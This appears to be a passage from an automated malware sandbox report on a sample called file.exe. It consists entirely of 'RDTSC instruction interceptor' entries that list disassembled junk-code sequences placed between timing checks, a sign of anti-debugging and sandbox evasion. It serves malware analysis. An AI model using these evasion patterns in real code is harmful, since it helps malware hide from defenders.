          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124ADE9 second address: 124AE56 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 js 00007F4F296427A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007F4F296427B8h 0x00000012 pop ebx 0x00000013 jnl 00007F4F296427BBh 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c jmp 00007F4F296427B9h 0x00000021 pushad 0x00000022 popad 0x00000023 pop eax 0x00000024 push ebx 0x00000025 jng 00007F4F296427A6h 0x0000002b pushad 0x0000002c popad 0x0000002d pop ebx 0x0000002e push edi 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124B540 second address: 124B55C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB6Eh 0x00000007 jne 00007F4F28CDCB66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124BF73 second address: 124BF80 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4F296427A8h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124BF80 second address: 124BFAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F28CDCB78h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4F28CDCB6Ah 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124BFAF second address: 124BFB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124BFB3 second address: 124BFC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F4F28CDCB68h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124DA14 second address: 124DA1B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124DA1B second address: 124DA24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124DA24 second address: 124DA2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12503BE second address: 12503C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12503C4 second address: 12503CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12503CA second address: 12503CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12503CE second address: 12503D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1253A83 second address: 1253A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125FFF3 second address: 1260005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F4F296427ABh 0x0000000b popad 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1260005 second address: 126002B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4F28CDCB6Ch 0x00000008 jnc 00007F4F28CDCB66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007F4F28CDCB68h 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F4F28CDCB6Ch 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126DDD7 second address: 126DDE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4F296427A6h 0x0000000a popad 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270C57 second address: 1270C5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1289E2A second address: 1289E30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12890A7 second address: 12890C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F28CDCB75h 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12890C5 second address: 12890CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F4F296427A6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1289243 second address: 1289288 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4F28CDCB79h 0x00000010 jmp 00007F4F28CDCB75h 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12896D9 second address: 12896E7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4F296427A8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128984D second address: 128985D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F28CDCB6Ch 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1289AD9 second address: 1289B06 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jng 00007F4F296427A6h 0x00000009 js 00007F4F296427A6h 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F4F296427B6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1289B06 second address: 1289B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F28CDCB75h 0x00000009 jno 00007F4F28CDCB66h 0x0000000f popad 0x00000010 jng 00007F4F28CDCB72h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1289B2E second address: 1289B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F4F296427A6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1289B38 second address: 1289B44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F4F28CDCB66h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128B4C2 second address: 128B4F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jo 00007F4F296427A8h 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4F296427B3h 0x00000015 pushad 0x00000016 jmp 00007F4F296427ABh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128B4F3 second address: 128B4F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128E08F second address: 128E099 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128E099 second address: 128E0DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d pop ebx 0x0000000e nop 0x0000000f jmp 00007F4F28CDCB6Fh 0x00000014 push 00000004h 0x00000016 mov dword ptr [ebp+122D3344h], eax 0x0000001c push C7F8BA4Dh 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F4F28CDCB75h 0x0000002a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128E0DD second address: 128E0E3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128FE8F second address: 128FE96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128F9F3 second address: 128F9FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291AB0 second address: 1291AB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291AB4 second address: 1291ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291ABC second address: 1291AC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291AC2 second address: 1291AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291AC8 second address: 1291ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119EDAC second address: 119EDB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119EDB0 second address: 119EDC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jc 00007F4F28CDCB83h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340363 second address: 5340368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340388 second address: 534038C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534038C second address: 534039F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F296427AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370008 second address: 537000C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537000C second address: 5370012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370012 second address: 5370048 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cx, di 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4F28CDCB75h 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370048 second address: 537004E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537004E second address: 5370052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370052 second address: 5370056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370056 second address: 5370074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4F28CDCB71h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370074 second address: 537007A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537007A second address: 5370092 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370092 second address: 5370096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370096 second address: 537009C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537009C second address: 53700A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53700A2 second address: 53700A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53700A6 second address: 53700C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F296427AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53700C1 second address: 53700C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53700C5 second address: 53700CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53700CB second address: 537011C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov si, di 0x0000000e pushfd 0x0000000f jmp 00007F4F28CDCB6Dh 0x00000014 adc al, FFFFFFB6h 0x00000017 jmp 00007F4F28CDCB71h 0x0000001c popfd 0x0000001d popad 0x0000001e xchg eax, ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F4F28CDCB6Dh 0x00000026 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537011C second address: 5370163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4F296427B7h 0x00000009 add eax, 5D90F19Eh 0x0000000f jmp 00007F4F296427B9h 0x00000014 popfd 0x00000015 push eax 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370163 second address: 5370167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370167 second address: 5370176 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F296427ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370176 second address: 537018E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4F28CDCB74h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537018E second address: 53701AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F296427ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4F296427ABh 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53701AF second address: 53701CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53701CC second address: 53701D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53701D2 second address: 53701D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53701D6 second address: 53701DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53701DA second address: 537023C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007F4F28CDCB6Fh 0x0000000e lea eax, dword ptr [ebp-04h] 0x00000011 jmp 00007F4F28CDCB76h 0x00000016 nop 0x00000017 pushad 0x00000018 mov edx, esi 0x0000001a call 00007F4F28CDCB6Ah 0x0000001f pop esi 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 call 00007F4F28CDCB79h 0x0000002a pop esi 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537023C second address: 537026F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4F296427AAh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007F4F296427AAh 0x00000017 adc esi, 74722908h 0x0000001d jmp 00007F4F296427ABh 0x00000022 popfd 0x00000023 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537026F second address: 5370273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370335 second address: 537033B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537033B second address: 5370354 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370354 second address: 5370358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370358 second address: 53703AC instructions: 0x00000000 rdtsc 0x00000002 mov ah, 4Eh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F4F28CDCB75h 0x0000000c and cx, 1C66h 0x00000011 jmp 00007F4F28CDCB71h 0x00000016 popfd 0x00000017 popad 0x00000018 leave 0x00000019 pushad 0x0000001a movzx ecx, dx 0x0000001d call 00007F4F28CDCB79h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53703AC second address: 5360054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 retn 0004h 0x00000009 nop 0x0000000a cmp eax, 00000000h 0x0000000d setne al 0x00000010 xor ebx, ebx 0x00000012 test al, 01h 0x00000014 jne 00007F4F296427A7h 0x00000016 xor eax, eax 0x00000018 sub esp, 08h 0x0000001b mov dword ptr [esp], 00000000h 0x00000022 mov dword ptr [esp+04h], 00000000h 0x0000002a call 00007F4F2D9DBBE3h 0x0000002f mov edi, edi 0x00000031 pushad 0x00000032 call 00007F4F296427B2h 0x00000037 movzx eax, dx 0x0000003a pop ebx 0x0000003b mov cl, 29h 0x0000003d popad 0x0000003e push ebx 0x0000003f jmp 00007F4F296427B4h 0x00000044 mov dword ptr [esp], ebp 0x00000047 jmp 00007F4F296427B0h 0x0000004c mov ebp, esp 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F4F296427AAh 0x00000057 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360054 second address: 5360058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360058 second address: 536005E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536005E second address: 53600EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push FFFFFFFEh 0x0000000b jmp 00007F4F28CDCB70h 0x00000010 push 35A2786Dh 0x00000015 jmp 00007F4F28CDCB71h 0x0000001a add dword ptr [esp], 400825DBh 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F4F28CDCB6Ch 0x00000028 xor cl, FFFFFFD8h 0x0000002b jmp 00007F4F28CDCB6Bh 0x00000030 popfd 0x00000031 mov dx, si 0x00000034 popad 0x00000035 push 30FCDF55h 0x0000003a jmp 00007F4F28CDCB6Bh 0x0000003f xor dword ptr [esp], 4559F425h 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F4F28CDCB75h 0x0000004d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53600EE second address: 5360146 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 4Dh 0x00000005 pushfd 0x00000006 jmp 00007F4F296427B8h 0x0000000b xor ah, FFFFFFC8h 0x0000000e jmp 00007F4F296427ABh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr fs:[00000000h] 0x0000001d pushad 0x0000001e mov di, si 0x00000021 mov si, 7C37h 0x00000025 popad 0x00000026 nop 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F4F296427B4h 0x00000030 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360146 second address: 5360155 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360155 second address: 536016D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4F296427B4h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536016D second address: 5360171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360171 second address: 53601D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4F296427AEh 0x0000000e nop 0x0000000f jmp 00007F4F296427B0h 0x00000014 sub esp, 18h 0x00000017 pushad 0x00000018 mov di, cx 0x0000001b mov si, 93A9h 0x0000001f popad 0x00000020 xchg eax, ebx 0x00000021 jmp 00007F4F296427B4h 0x00000026 push eax 0x00000027 jmp 00007F4F296427ABh 0x0000002c xchg eax, ebx 0x0000002d pushad 0x0000002e push eax 0x0000002f mov si, di 0x00000032 pop edi 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53601D0 second address: 5360210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, cx 0x00000007 popad 0x00000008 popad 0x00000009 xchg eax, esi 0x0000000a jmp 00007F4F28CDCB72h 0x0000000f push eax 0x00000010 jmp 00007F4F28CDCB6Bh 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F4F28CDCB75h 0x0000001d rdtsc
